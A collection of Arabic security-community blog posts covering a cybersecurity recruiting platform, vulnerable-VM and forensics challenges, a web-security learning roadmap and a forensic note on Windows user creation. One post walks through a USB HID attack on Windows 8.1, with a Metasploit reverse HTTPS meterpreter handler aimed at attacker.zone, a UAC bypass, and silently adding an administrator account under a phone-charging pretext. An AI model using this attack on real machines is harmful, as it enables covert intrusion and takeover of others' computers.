Cyber Talents اول منصة عربية لتوظيف المواهب في الأمن السيبراني عن طريق المسابقات والاختبارات التقنية

cyber-talents

العديد من المبرمجين في الوطن العربي قاموا بالمشاركة في مسابقات البرمجة الدولية التي تقام علي مستوي العالم سواء

كانت Google Jam اوFacebook Hacker اومسابقة ACM الشهيرة لطلبة الجامعات . يعلم المشاركون في هذه المسابقات انه بمجرد وصولك للمسابقة العالمية فان عروض التوظيف تنهال عليك من جميع الشركات العالمية بالاف الدولارت شهريا.وهذا امر طبيعي فكل طالب قد تم وضعه في اختبارت و تحديات عملية استطاع من خلالها اثبات نفسه واثبات مهاراته سواء علي نطاق جامعته او حتي بلده مما يجعل هذه المسابقات مقصد الشركات العالمية كل عام

ولكن يظل عدم وجود مسابقة قارية او عالمية بهذا الحجم في مجال الامن السيبراني هو مشكلة تحتاج الي حل. معتز صلاح وادهم محمد بداوا حملة تمويل جماعي علي موقع ذومال من اجل حل مشكلة النقص الحاد في العاملين بمجال الامن السيبراني عن طريق انشاء اول منصة عربية لتقييم وتوظيف المواهب في مجال الامن السيبراني من خلال المسابقات التقنية و اطلقوا عليها اسم Cyber Talents .

تقام الاختبارات التقنية التفاعلية سواء علي نطاق فردي او علي نطاق اقليمي . كل مستخدم لديه حسابه الخاص الذي يقوم من خلاله بحل مئات التحديات في مجالات الامن السيبراني المختلفة مثل امن الشبكات , امن المواقع , الهندسة العكسية , التشفير وغيرها الكثير. كلما استطاع كل مستخدم حل عدد اكبر من التحديات المختلفة كلما ارتفع ترتيبه علي المستوي الدولي او الاقليمي . عن طريق نفس المنصة سيكون من السهل علي الشركات التي تسعي لتوظيف هذه المهارات الوصول الي افضل الكفاءات بعد ان تم تقييمهم و مرورهم بهذه التحديات المختلفة. الهدف من Cyber Talents ان يكون هوالمجتمع الذي يجمع افضل المواهب في مجال الامن السيبراني علي مستوي الوطن العربي كبداية و علي مستوي العالم كخطوة ثانية .

بسؤال معتز صلاح مؤسس Cyber Talents قال ان الدافع الرئيسي لانشاء Cyber Talents هو ان الشركات تعاني من نقص شديد في ايجاد المهارات المطلوبة في هذا المجال و ليس بسبب نقص الافراد ولكن بسبب انه لايوجد وسيلة لربط اصحاب المهارات باصحاب الشركات. بالاضافة ان اساليب التوظيف الحالية لهذه الوظائف غير دقيقة ولاتلائم طبيعة العمل الذي يعتمد بالمقام الاول علي مهارات الشخص التقنية مما يجعل الشركات تعاني في ايجاد الشخص المناسب . فليس من المنطقي ان يمر المتقدم علي اختبارات لغة اجنبية لعدة ساعات و اختبارات موارد بشرية لعدة ساعات اخري ثم يكتفي الجزء التقني فقط بمقابلة مع مديره المباشراما لعدم وجود الاختبارات التقنية الكافية لدي الشركة التي قد تحتاج الي معمل و اجهزة وشبكة منفصلة و غيرها من البنية التقنية المكلفة او بسبب ان انشاء هذه الاختبارات يحتاج الي مهارة معينة ربما لا تكون موجودة في شركات التوظيف.

Cyber Talents هو مشروع فريد من نوعه في مجال الامن السيبراني ويهدف الي بناء جيل جديد من المواهب والمهارات تستطيع حماية البنية التحتية لاوطاننا العربية التي اصبحت تدارمعظمها اليكترونيا بدءا من محطات الكهرباء والمياه مرورا بمنظومة المواصلات و الطيران مرورا بالمنظومة البنكية والمصرفية التي تشتمل علي بطاقات الائتمان وغيرها . ومع تطور التكنولوجيا السريع في الخمس سنوات السابقة اصبح من الواجب علينا ان يواكب هذا تطورا مماثلا في مهارات الافراد و هذا مايحاول Cyber Talents توفيره.

المشروع سيبدا اطلاقه التجريبي بنهاية هذا العام و ويحتاج فريق العمل لدعمكم . لمعرفة التفاصيل عن المشروع و خطواته الضغط علي الرابط التالي :

https://www.zoomaal.com/projects/48486?ref=38627481

تحدي : تطبيق الويب Hisoka

تحدي Hisoka هو هو عبارة عن تطبيق  Web  يعمل على نظام تشغيل Linux. يحتوي التطبيق على بعض الثغرات المترابطة لكي تصل إلى النظام و الحصول على المستخدم الجذر root. يجب تثبيت برنامج VMware Workstation الإصدار 10 أو الأحدث للتشغيل

طريقة تشغيل الجهاز الوهمي

  • بعد اكتمال تحميل جميع الأجزاءالمضغوطة (من هنا)  و فكها
  • قم بعمل استيراد (Import) لملف OVA
  • شغل الجهاز الوهمي وابدأ التحدي

الهدف النهائي هو الحصل على الملف proof.txt الموجود في المسار  /root/ 

صور متفرقة من الجهاز الوهمي Hisoka

hisoka2

hisoka1

 

بالتوفيق للجميع,,

تحدي: تحقيق جنائي ألكتروني رقم (4)

السلام عليكم ورحمة الله وبركاته

مرحباً بجميع زوار مجتمع الحماية العربي هذا أولاً، وأتمنى يضيف هذا التحدي المزيد من المعلومات والأفكار لجميع المشاركين وحتى لللذين سوف يقوموا بقراءة نتائج التحدي في نهاية المشوار. قبل أن أبدأ بشرح فكرة التحدي وما الى ذلك، أود أن أقوم بشكر خاص لجميع الأخوة الذين شاركوا في مسابقة المجتمع الرمضانية السابقة، وبصراحة عملهم الرائع هو من دفعنا الى القيام بإضافة هذا التحدي الجديد.

التحدي رقم (4):
تم إختراق الموقع اللألكتروني لأحدى الشركات، وقام فريق العمل بالذهاب الى الشركة وأخذ صورة جنائية (Forensic Image) من النظام وكذلك الذاكرة وذلك من أحل إجراء التحقيق اللازم. الملفات الخاصة بالجريمة هي:
1- صورة النظام (هنا)
2- صورة ذاكرة النظام (هنا)
3- ملف يحتوي على قيم الـ Hash للملفات (هنا)
password = [email protected]

لحل التحدي بنجاح، يجب تسليم تقرير مفصل يجيب على ما يلي:
1- ما هي الهجمات ونوع الهجمات التي قام بها المهاجم؟
2- عدد المستخدمين الذي قام بإضافتهم المخترق، وما هي الآلية التي قام بإضافة كل واحد منهم؟
3- ما هي الملفات، الادوات، المعلومات، الى آخره، من الأمور التي تركها المهاجم خلفه؟ (لنفترض إنه لم يستطع حذفها لضيق الوقت وسرعة وصول فريقنا الى موقع العمل).
4- ما هي البرمجيات المنصبة على النظام وهل تم تنصيبها من قبل المهاجم أم لا؟
5- بإستخدام التحليل الرقمي للذاكرة، هل تستطيع ان تكتشف ما هو نوع الـ shellcode التي تم حقن النظام بها؟
6- ما هو التحليل الزمني (Timeline Analysis) لجميع ما حصل على هذا النظام؟
7- ما هي فرضيتك للقضية، وما هو المنهج المتبع في حل القضية؟
8- هل هناك ملاحظات إضافية تود إضافتها؟

سؤال إضافي (BONUS):
ما هي الملفات أو المجلدات التي قام بإنشاءها المهاجم على النظام؟ عدد جميعها مع ذكر أدلة تثبت صحة ذلك.

ملاحظات مهمة:
يجب أن يتم حل القضية بإستخدام أدوات مجانية أو حُرة بالكامل، وأن لا يتم إستخدام أدوات تجارية.

بالتوفيق للجميع.

ENGLISH Version:
Digital Forensic Challenge #4:
A company’s webserver has been breached through their website. Our team arrived just in time to take a forensic image of the running system and its memory for further analysis. The files can be found below:
1- System Image: here
2- System Memory: here
3- Hashes: here
4- Passwords = [email protected]

To successfully solve this challenge, a report with an answers to the tasks below is required:
1- What type of attacks has been performed on the box?
2- How many users has the attacker(s) added to the box, and how were they added?
3- What leftovers (files, tools, info, etc) did the attacker(s) leave behind? (assume our team arrived in time and the attacker(s) couldn’t clean & cover their tracks)
4- What software has been installed on the box, and were they installed by the attacker(s) or not?
5- Using memory forensics, can you identify the type of shellcode used?
6- What is the timeline analysis for all events that happened on the box?
7- What is your hypothesis for the case, and what is your approach in solving it?
8- Is there anything else you would like to add?

Bonus Question:
what are the directories and files, that have been added by the attacker(s)? List all with proof.

Important Note:
The case MUST be solved using open source and free tools only (NO EnCase, FTK, etc) are allowed.

Good luck…

نتائج تحدّي التحقيق الجنائي الرّقمي

في مجتمع الحماية العربي نسعى الى الارتقاء بالمحتوى العربي على الانترنت وتحديد في أمن المعلومات الرقمية سواء كان ذلك من خلال توفير تغطية لجوانب متعددة في أمن المعلومات. أو عبر نشر تحديات في مواضيع مختلفة بهدف توفير بيئة للشباب لاختبار قدراتهم ووضعها على محط التحدي.

التحدي الاخير كان حول التحقيق الجنائي الرقمي وهو موضوع قل ما يطرح عربيا. التحدي كان من وضع زميلنا الدكتور علي الشّمري والذي يعتبر من روّاد هذا المجال عربياً.

قبل أن نعلن اسماء الفائزين بهذا التحدي نود أن نشكر جميع من شاركنا في هذا التحدي سواء عبر ارسال حلول أو عبر دعمنا بنشر التحدي ونخص بالذكر الإخوة في نقطة أمن على دعمهم لنا عبر تقديهم جائزة المركز الثالث.

تلقينا العديد من الحلول الرائعة والتي تظهر قدرات كبيرة وخبرات عالية لدى الشباب العربي. الإجابة التي حازت على تقديرنا الشديد كانت للاخ علي خوجه والذي شارك في كافة مراحل التحدي وكانت اجاباته تفصيلية ورائعة ولهذا اخترناها لتكون الاجابة التي سنقدمها للجميع لهذا التحدي.

يمكن تحميل إجابة الاخ علي خوجه من هنا.

المركز الثاني فاز به الاخ علي خلفان حيث قام بحمل جميع مراحل التحديث أيضاً وكانت اجاباته رائعة كذلك.

المركز الثالث فاز به الاخوان مصطفى العيسائي ومحمد الغامدي حيث تقدما بحل مشترك لتحدي.

مشاركات رائعة: الاخوة محمد الغامدي ومحمد الجولاني شاركونا حلولهم لبعض مراحل التحدي وليس جميعها ولكن كان حلولهم رائعة فاحببنا ان نذكرهم ونشكر لهم مشاركتنا التحدي.

مرة أخرى نشكر الجميع ونتمنى لكم حظا طيبا في القادم من تحديات مجتمع الحماية.

 

ملاحظة: بخصوص الجوائز للفائزين نرجو من الاخوة التواصل معنا عبر البريد الالكتروني challenges @ security4arabs dot net او بمراسلتنا على توتير @seecurity4arabs

تحدي: تحقيق جنائي ألكتروني رقم (3)

أجدد الترحيب بكم ونبدأ على بركة الله التحدي الثالث لمجتمع الحماية العربي، والذي يتركز حول التحقيق في قيام مشتبه به بعمليات إختراق غير شرعية. لكن قبل البدأ في تفاصيل التحدي، أود شكر الأخوة من “نقطة أمن” حول دعمهم للتحدي بجوائز للأخوة المشاركين تضاف الى الجوائز التي يقدمها مجتمع الحماية العربي نفسه. كما أود أن أشكر كل من صرف من وقته سواء القليل أو الكثير للقيام بحل هذه التحديات والتي أسئل الله أن تكون مفيدة لنا جميعاً.

تحدي: تحقيق جنائي ألكتروني رقم (2)

مرحباً مرة آخرى، اليوم نصل لتحدي مجتمع الحماية العربي الثاني، نتمنى تكونوا قد أستفدتم من التحدي السابق. كل تحدي سيكون أهدافه مختلفة وذلك لنستفيد من المشكلة الموجودة وكيف سنقوم بحلها بواسطة أدواة بسيطة متوفرة للجميع. كذلك سنقوم بجعل كل تحدي أصعب من الذي يسبقه، وبعضها هي التي تفتح لك إمكانية العمل على التحدي الذي بعده، أي لن تستطيع مثلاً أن تعمل على التحدي رقم 3 بدون حل التحدي رقم 2. تحدي اليوم إجباري تجاوزه إن كنت تريد الوصول للتحدي القادم، وذلك لأن القادم يعتمد بالكامل على نجاحك في التحدي الحالي وتجاوزه.

قبل أن أدخل في تفاصيل التحدي، أريد التأكيد على أفكار لتحديات. فإن كانت لديك أفكار لجرائم ممكن يتم تحويلها الى قضايا للدراسة والإستفادة العلمية والتقنية منها، فلا تترددوا إما بإرسالها لنا وسيتم نشرها بإسمكم أو بالتواصل معنا لعملها لبقية زوار ومتابعي الموقع والإستفادة من الأفكار التي فيها.

تحدي: تحقيق جنائي ألكتروني رقم (1)

في البداية رمضان مبارك على الجميع، وأدعوا الله أن يعيننا على صيامه وقيامه، وأن يغفر لنا جميع ذنوبنا.

قررنا في مجتمع الحماية العربي، عمل مسابقة أسبوعية خلال شهر رمضان المبارك، وتكون عبارة عن جريمة ألكترونية بسيطة وعليكم بالقيام بحل القضية وذلك بهدف زيادة الوعي في مجال التحقيقات الجنائية الالكترونية. المسابقات سوف تبدأ بقضية بسيطة، وبعد ذلك تتعقد شيئاً فشيئاً. خلال عملك في حل كل قضية سوف تكتسب خبرة ولو بسيطة في جانب من جوانب التحقيقات الجنائية الالكترونية وبإستخدام أداوت بسيطة ومتوفرة للجميع. على بركة الله نبدأ القضية الأولى، ولديكم أسبوع واحد من الآن لحل القضية.

ملاحظة: إن كانت لديك أفكار لجرائم ممكن يتم تحويلها الى قضايا للدراسة والإستفادة العلمية والتقنية منها، فلا تترددوا إما بإرسالها لنا وسيتم نشرها بإسمكم أو بالتواصل معنا لعملها لبقية زوار ومتابعي الموقع والإستفادة من الأفكار التي فيها.

كيف تبدأ طريقك في إكتشاف ثغرات المواقع وبرامج المكافآت المالية.

howto-header

السلام عليكم ورحمة الله وبركاته,

اليوم أكتب لكل الذين يريدون أن يبدأوا في مجال أمن المواقع أو بدأو فعليا لكنهم لم يجدوا الطريق الذي يسيرون عليه.

ملحوظه: لن اكتب عن كيف تبدأ في مجال أمن المعلومات بشكل عام لأنه متنوع بشكل كبير

Network Security, Malware Analysis, Systems Security, Forensics, Reverse Engineering, Incident Handling وغيرها

لكني سأكتب في المجال الذي فيه تخصصي وهو أمن تطبيقات المواقع Web Applications Security حتي يمكنني إيصال المعلومة بشكل سليم ليكون ان شاء الله دليل ومرجع لمن يريد أن يبدأ في مجال أمن مواقع الإنترنت وإكتشاف ثغراتها ويجني المال من ذلك 😀

رجاءآ اعلم جيدا أخي ان الموضوع سيتطلب منك وقت وجهد ولن يأتي بين يوم وليلة, وهذا الموضوع هو بمثابة خريطة لك تسير عليها في الفترة القادمة حتي تصير في مستوي متقدم بإذن الله, يعني ضع لنفسك جدول انه في خلال الثلاثة أشهر أو الست أشهر القادمة علي حسب ترتيبك أنت, تكون أنهيت كل متطلبات هذا الموضوع.

الأجندة:

١- كيف تفهم مجال إدارة المواقع الإلكترونية ومصطلحاتها وتتمرن عليها جيدا.

٢- كيف تبدأ في التعرف علي أنواع ثغرات المواقع وتفهمها جيدا.

٣- ما هي الخطوات المطلوبه لكي تكون قادرا علي إكتشاف ثغرات المواقع بنفسك.

٤- كيف تجني المال من اكتشاف ثغرات المواقع.

Screen Shot 2015-03-28 at 4.31.30 AM

١– كيف تفهم مجال إدارة المواقع الإلكترونية ومصطلحاتها وتتمرن عليها جيدا؟

حسنا, لكي تبدأ في مجال أمن مواقع الإنترنت فيجب عليك أولا أن تفهم مجال إدارة مواقع الانترنت بشكل عام وكيف تعمل مواقع الإنترنت وما هي اللغات البرمجيه التي تستخدمها وماهي قاعدة البيانات وكيف تعمل وكيف يتم الربط بينها وبين التطبيقات(Applications) وغيرها من الأسئلة.

الموضوع سهل وبسيط إن شاء الله, سنقوم بتجربة عمل موقع إلكتروني وتشغيله كتدريب عملي علي كيف تعمل المواقع الإلكترونية وكيف تعمل قواعد البيانات وما هي ال Domains وغيرها.

المطلوب منك عزيزي القارئ أن تستخدم جوجل في البحث والقرآءة عن:

١- ما هي mysql وما هي phpmyadmin

٢- ما هو ال Appserv وكيف يمكن تثبيته (Install)

٣- ما هو ال WordPress وكيف يمكن تشغيله علي السيرفر المحلي Appserv

٤- كيف تقوم بحجز مساحة إستضافة مجانية و domain مجاني وتقوم بتشغيل ال WordPress عليها

٥- ما هو سكربت Vbulletin وكيف تقوم بتركيبه علي إستضافة مجانية أو علي ال Appserv

٦- مطلوب منك أن تقرأ جيدا عن ال HTML وتقوم بتصميم صفحات بها حتي تتمرن عليها جيدا وهي لغة سهله جدا ويمكن تعلمها في وقت قصير لكنك لن تدرك مدي سعادتك وأنت تجرب إنشاء صفحتك الخاصه وتضعها علي موقعك علي الإنترنت للمره الاولي 🙂

أنصحكم بمتابعة الكورس التالي بخصوص لغة ال HTML

٧- الآن جاء دور لغة البرمجة PHP وليس مطلوب منك أن تكون محترف فيها بل أن تعلم أساسيات اللغة سيكون كافيا لك لتبدأ في مجال أمن المعلومات, وحتي لا تتعب في البحث, إليك الكورس التالي وهو كورس مجاني ورائع وكافي أيضا للمبتدأين في لغة البرمجة PHP

 

#شكرا أخونا يوسف إسماعيل علي هذه الكورسات المميزة.

٨- يمكنكم أيضا ( بشكل إختياري) مشاهدة بعض الدروس (١٠ مثلا) من هذا الكورس الذي يشرح ال JavaScript باللغة العربية وهي لغة مفيدة جدا في مجال إكتشاف ثغرات المواقع:

إن شاء الله بعد إنهاء هذه الخطوات أضمن لك تماما أنك ستفهم جيدا كيف تعمل مواقع الإنترنت وما هي قواعد البيانات وكيف يتم إدارتها وربطها بالتطبيقات المختلفة وستتعلم كيف تقوم بإنشاء موقع علي الإنترنت وتقوم بإدارته وستعرف جيدا أغلب المصطلحات المنتشرة في هذا المجال وستفهم لغات البرمجة وكيف تعمل.

٢- كيف تبدأ في التعرف علي أنواع ثغرات المواقع وتفهمها جيدا؟

سأفترض بأنك قمت بعمل الخطوات السابقه والآن أصبحت لديك القدرة لفهم باقي ما سيتم كتابته لأنه لا أحد يصعد السلم ويبدأ من الدرجة السادسه!

owasp-logo0

حسنا الآن أصبحت لديك خلفية عن لغة البرمجة PHP وكيف تعمل, للتعرف علي ثغرات المواقع وما هي وكيف تصاب المواقع بهذه الأنواع من الثغرات, فعليك أن تجعل مرجعك في ذلك هو موقع owasp.org وهو الموقع المصنف الأول عالميا في شرح ثغرات ال Web Applications وتصنيف أخطر الثغرات لكل عام.

https://www.owasp.org/index.php/Top_10_2013-Top_10

الرابط الذي بالأعلي يحتوي علي أخطر عشر ثغرات تصاب بها تطبيقات الإنترنت (Web Applications) ويشرح كل ثغرة تفصيلا وكيف يتم اكتشافها واستغلالها فقط قم بالضغط علي إسم الثغره وستظهر لك تفاصيلها بالكامل.

مراجع اخري عن ثغرات المواقع وباللغة العربية:

الكورس بالأعلي يشرح أخطر عشر ثغرات تصيب مواقع الانترنت والكورس باللغة العربية.

شرح ثغرات Unvalidated Redirects وتطبيقها علي موقع Kaspersky

شرح ثغرات Cross Site Scripting

شرح ثغرات SQL injection

والرابط التالي هو لكورس ممتاز يشرح وبالتفصيل جميع أنواع ثغرات ال SQL Injection من البداية وحتي مستوي الإحتراف إن شاء الله.

https://www.youtube.com/playlist?list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro

٣- ما هي الخطوات المطلوبة لكي تكون قادرا علي إكتشاف ثغرات المواقع بنفسك؟

لكي تتعلم كيف تكتشف ثغرات المواقع بنفسك ويصبح الموضوع سهل بالنسبة إليك, عليك تطبيق هذه الثغرات كثيرا, والموضوع بسيط, هناك تطبيقات كثيره تم برمجتها خصيصا لكي يقوم الدارسين بالتعلم عليها وتجربة الثغرات الموجودة فيها, مثال ذلك قم بتنصيب ال Application المسمي DVWA علي ال Appserv علي جهازك ثم قم بتطبيق المتطلبات التالية:

١- قم بإكتشاف وإستغلال الثغرات الموجوده في هذا التطبيق في حالة ما اذا كان مستوي الحماية فيه ضعيف

٢- نفس الشئ بالأعلي ولكن قم بتطبيقه في حالة اذا كان مستوي الحماية متوسط

يمكنك أيضا التجربة وإكتشاف الثغرت في هذه المواقع المعدة أيضا لنفس الغرض والمصابة بالعديد من أنواع الثغرات:

http://testphp.vulnweb.com

https://xss-game.appspot.com

لا مانع من المساعدة بواسطة البحث في جوجل أو حتي رؤية فيديوهات تشرح لك كيف تكتشف وتستغل ثغرات هذا التطبيق فأنت في مرحلة التعلم وعليك اللجوء إلي جميع المصادر المتاحة لتتعلم جيدا 🙂

والآن بقيت لنا المرحلة الأخيرة.

Screen Shot 2015-04-03 at 2.15.00 AM

٤- كيف تجني المال من اكتشاف ثغرات المواقع؟

هناك عدة مواقع تدير برامج تسمي Bug Bounty Programs يعني برامج المكافآت المالية, ويمكن من خلال هذه المواقع البحث ومشاهدة ما هي المواقع التي تسمح لك بالبحث عن ثغرات داخلها ومن ثم إبلاغ تلك المواقع عن ثغراتهم ليقومو بترقيع تلك الثغرات, وفي المقابل ستحصل علي مكفأه مالية مقابل إكتشافك 😀

هذه المواقع مثل:

https://hackerone.com/programs

و

https://bugcrowd.com/list-of-bug-bounty-programs

فإذا ذهبنا مثلا للموقع الأول فإنك ستجد المواقع معدة بالشكل التالي:

Screen Shot 2015-04-03 at 3.02.57 AM

 

إسم الموقع الذي يسمح لك بإكتشاف ثغرات لديه, وأقل مبلغ يدفعونه علي الثغرات التي يتم إكتشافها عندهم

عند الضغط علي اسم اي موقع من هذه المواقع ستجد تفاصيل أكثر توضح ما هي Web Applications او النطاقات التي يسمح لك الموقع بالبحث فيها, وما هي أنواع الثغرات التي يقبلونها, وما هو أقل مبلغ وأعلي مبلغ يدفعونه مقابل إكتشافك لثغرات لديهم والمزيد عن الموقع وما يقدمه من خدمات للباحثين الأمنيين.

فمثلا لو إكتشفت ثغره من نوع XSS في موقع الياهو فإنك ستحصل علي مكافأه تتراوح ما بين 50 إلي 500 دولار للثغره الواحده! وتتزايد المكافآت المالية بشكل رهيب في حالة إكتشاف ثغرات أعلي في الخطورة مثل ثغرات ال SQL Injection, Remote Code Execution, Authentication Bypass وغيرها.

أنصحكم بإنشاء حساب علي موقع Hackerone.com وأخذ جولة في الصفحه المدرجه بالأعلي لتعرفوا المزيد والمزيد عن ال Bug Bounty Programs وكيف يتم المساهمة فيها.

وينطبق نفس المثال بالأعلي علي الموقع الثاني المدرج أعلاه.

روابط مهمة:

https://www.exploit-db.com

https://www.securitytube.net

https://www.thehackernews.com

كتب مهمة:

1- OWASP Testing Guidehttps://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf

الكتاب بالأعلي يحتوي علي شرح تفصيلي وبالأمثلة لجميع أنواع ثغرات تطبيقات الإنترنت (Web Applications) وكيف يتم إكتشاف تلك الثغرات والأدوات اللازمة لذلك.

2- Web apps hackers handbook – كتاب رائع لكن ليس مجاني

3- SQL injection attacks and defensehttps://adrem.ua.ac.be/sites/adrem.ua.ac.be/files/sqlinjbook.pdf

الكتاب بالأعلي هو مرجع شامل لثغرات ال SQL Injection كيف تحدث وكيف يتم إستغلالها وكيف يتم ترقيعها في الكود البرمجي للموقع.

كورسات:

تعلم لغة البرمجة Python

هذا الكورس من الكورسات الرائعة وباللغة العربية يشرح لغة البرمجة Python من خلال سلسلة من الدروس.

https://www.cybrary.it/course/ethical-hacking/Penetration Testing and Ethical Hacking

من الكورسات الرائعه في مجال إختبار الإختراق وإكتشاف الثغرات وهو كورس مجاني.

Web Application Pentestinghttps://www.pentesteracademy.com/course?id=5

من الكورسات الرائعة والشاملة في مجال إكتشاف ثغرات المواقع لكنه ليس مجاني.

أدوات مهمة:

من الأدوات المهمة التي ستحتاج أن تعرفها وتقرأ عنها وعن كيفية إستخدامها وتجربها إن أمكن, فهي تسهل عليك الكثير في إكتشاف وإستغلال ثغرات المواقع:

١- Acunetix

2- NetSparker

3- BurpSuite

4- Havij

تحديث هام١:

شبابنا الكرام: بدأنا كورس عملي يشرح بالتفصيل إختبار إختراق تطبيقات الويب علي الرابط التالي:

إنطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية مجانا

تحديث هام ٢:

قمت بعمل مادخله مع صفحة CyberTalents وشرحت فيها كيف تبدأ وتعمل في مجال اختبار اختراق تطبيقات الويب. يمكنكم مشاهدتها من الرابط التالي:

What is required to work in Web Pentesting Jobs

Posted by CyberTalents on Saturday, October 7, 2017

 

إلي هنا أحبتي ينتهي هذا الموضوع, أرجو أن يكون مرجع للبادئين والمتوسطين في مجال أمن تطبيقات المواقع Web Applications Security Researchers وأن يتقبله الله عز وجل عملا خالصا لوجهه.

في حالة وجود أي إستفسار او طلب برجاء إصافته كتعليق comment هنا في نفس الموضوع لربما شخص أخر لديه نفس سؤالك فيتم الإجابة علي الجميع إن شاء الله.

شكرا للأشخاص الذين شاركوا في هذا الموضوع بالتعديل والإقتراحات:

أحمد حسن أبوالعلا, محمد عبدالعاطي, ياسر علي

#إن شاء الله سيتم تحديث الموضوع بشكل دوري.

اختراق نظام Windows 8.1 بهجوم USB HID

مقدمة

من فترة طويلة و أنا أريد استخدام نظام Kali – NetHunter المعدل للعمل مع نظام أندرويد على عدة اجهزة (Nexus 4, 5, 7, 10, OnePlusOne) وسيتم دعم المزيد مستقبلا. توزيعة NetHunter تحمل في قلبها توزيعة Kali وتستطيع أن تعمل كل ما تعمله Kali. في نفس الوقت, هناك إضافات و تسهيلات جعلت الاختراق أسهل بكثير وهناك العديد قادم في هذه التوزيعة الواعدة من تطوير offensive-security. هجوم اليوم هو HID أو Human Interface Device عن طريق استغلال توصيل الهاتف المحمول بالكمبيوتر وهذا شائع جدا ويسهل عليك أن تطلب شحن هاتفك من أي أحد يملك جهاز كمبيورت وغالبا ستقابل ترحابا بكل سهولة.  هناك تطبيقات غير محدودة لهذا الهجوم وسنعرض اليوم إحداها.

 

الشرح سيكون على جهاز OnePlusOne لكنه يسري على جميع الاجهزة المدعومة

خطوات الاختراق

سأفترض مسبقا بأنك ملم بالمصطلحات التقنية التي ذكرت وسأتضطرق لتعريف الجديد منها في موضوعي.

1. تشغيل الأباتشي

اختر NetHunter Home Launcher

Applications

Applications

ثم اسحب الشاشة من اليسار إلى اليمين و اختر Kali Service Control

Kali Service Control

Kali Service Control

ثم فعل الأباتشي من القائمة

2. إعدادات هجوم الـ USB HID

سأحاول وضع الخطوات بشكل مفصل كي نستفيد منه في شروحات قادمة -إن شاء الله-

2.1. جعل أندرويد في USB Debugging mode

من قائمة البرامج, اذهب إلى

Settings >> Developer options >> Android debugging

Debugging Mode

Debugging Mode

 

2.2. وصل الهاتف بالجهاز المراد اختراقه

إذا تم التوصيل بنجاح ستجد تنبيه الـ Debugging mode في شريط تنبيهات الهاتف وبدونه لن تنجح عملية الاختراق

2.3. إعدادت الـ PowerSploit

مشروع الـ PowerSploit  واحد من أجمل المشاريع الموجودة على الساحة حاليا و يستخدم إمكانيات الـ PowerShell في اختراق الويندوز. تم استخدام أحد إمكانيات هذا المشروع في توزيعة NetHunter بشكل رائع.

هذا الاستغلال يسمح لك بتشغيل اتصال HTTPS عكسي على Metasploit meterpreter

هناك أربع إعدادات رئيسية

IP Address – LHOST : وهو عنوان الجهاز المشغل للميتاسبلويت handler سنتفترض أنه attacker.zone

Port – LPORT: وهو المنفذ الذي ينصت إليه الـ metasploit handler

Payload: وهنا أنت مخير بين الـ HTTP و HTTPS طبعا الأخير أفضل

URL to Payload : غاالبا يكون نفس عنوان الهاتف المحمول -لهذا قمنا بتفعيل الأباتشي سابقا- إلا إذا كنت قد أعدت الـ Payload في مكان أخر.

PowerSploit Settings

PowerSploit Settings

2.3.1. تخطي التحكم في صلاحيات المستخدم UAC

نقوم بهذه الخطوة كي نضمن تنفيذ الهجوم بأعلى صلاحيات ممكنة والتأكد من عدم منع النظام للهجوم من تنفيذ أوامر الـ PowerSploit

UAC Bypass

UAC Bypass

 

2.3.3. إعداد الميتاسبلويت وتنفيذ الهجوم

تشغيل الميتاسبلويت و الـ handler على الهاتف الجوال أو على الجهاز المحدد في جزء IP Address -LHOST  سابقا والذي سيتصل عليه الـ Reverse HTTPS meterpreter

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST attacker.zone
set LPORT 4444
run

وأخيرا تنفيذ الهجوم

Execute Attack

Execute Attack

 

2.4. إعدادت الـ Windows CMD

هنا نفس طريقة الهجوم السابقة -ونفس الخطوات عدا تشغيل الأباتشي- لكن ينفذ أوامر تقوم أنت بإعدادها مسبقا و يقوم بتنفيذها على جهاز الضحية بدلا من تشغيل Reverse HTTPS meterpreter shell.

مثلا سنضيف مستخدم جديد اسمه KING ونجعله في مجموعة المدراء Administrators. طبعا تستطيع تعديل و إضافة ما تشاء من أوامر

Windows CMD

Windows CMD

 

شخصيا منبهر من سهولة و خطورة الهجوم و كيف أصبح جوالك ألة اختراق متحركة و بأقل الخطوات

تحياتي واحترامي

تحليل جنائي لإكتشاف الفرق بين إضافة مستخدم من قبل CLI أو GUI

الفكرة لهذه التدوينة جائت بعد أن قام أحد المتابعين (azeemnow) لـ #DFIR على تويتر بطرح السؤال حول كيف يمكننا أن نعرف هل قام المُخترق بإضافة مستخدم على نظام ويندوز من CLI أم من GUI؟

حاولت بالبداية أن أطرح عليه بعض الحلول ولكن على ما يبدو لم تنفعه كثيراً. هنا قلت لنفسي لما لا أقوم بعمل الخطوات نفسها وأرى بنفسي مالذي يمكنني التوصل له، وهذا ما فعلت!

الخطوات التي قمت بها ولكن ليست بالترتيب المذكور وذلك لكي أخلق لك عزيزي القاريء جو من التشويق والتجربة بنفسك، هي:
1- قمت بتشغيل cmd.exe بصلاحيات Administrator وقمت بتنفيذ الأمر الذي بالأسفل لإضافة مستخدم جديد سميته cmduser وكلمة السر له هي cmduser كذلك:
net user cmduser cmduser /add

2- بعد ذلك ذهبت الى لوحة التحكم (Control Panel) في نظام الويندوز ومن ثم الى User Account ومن هناك قمت بإضافة مستخدم أسميته guiuser.

الآن الفكرة التي كانت في مخيلتي هي إنه يمكنني من خلال تتبع السجلات الخاصة بالنظام (system logs) أن أحصل على أدلة كافية تقودني للتفريق بين المستخدم الذي تم عمله من سطر الأوامر وبين المستخدم الذي تم عمله من داخل لوحة تحكم النظام، لكن للأسف تبيين إنه لا يمكن معرفة ذلك بهذه الطريقة! فبعد أن أطلعت على السجلات، تبيين إنه لا فرق بتاتاً بين كلا العمليتين سوى التاريخ، وبدون شك إسم المستخدم 🙂 حيث في برنامج عرض الأحداث (Event Viewer)، قام النظام بتسجيل الحدث رقم 4720 والذي يعني “إنشاء حساب مستخدم جديد” (A user account was created) لكلا الحالتين. وكما أسلفت، لكي لا تعرف عزيزي القاريء أيهما تم إنشاءه أولاً، فإنه المستخدم الأول (بغض النظر عن إسمه حالياً) تم إنشاءه بتاريخ 1/7/2014 4:40:02 pm بينما المستخدم الثاني تم إنشاءه بتاريخ 1/7/2015 4:40:30 pm.

صديقنا azeemnow كان قد عمل ما يسمى بـ super timeline وذلك لتوضيح تواريخ الأحداث وترتيبها “تسلسلها”، ولكن هذا لم يجدي الكثير من النفع!

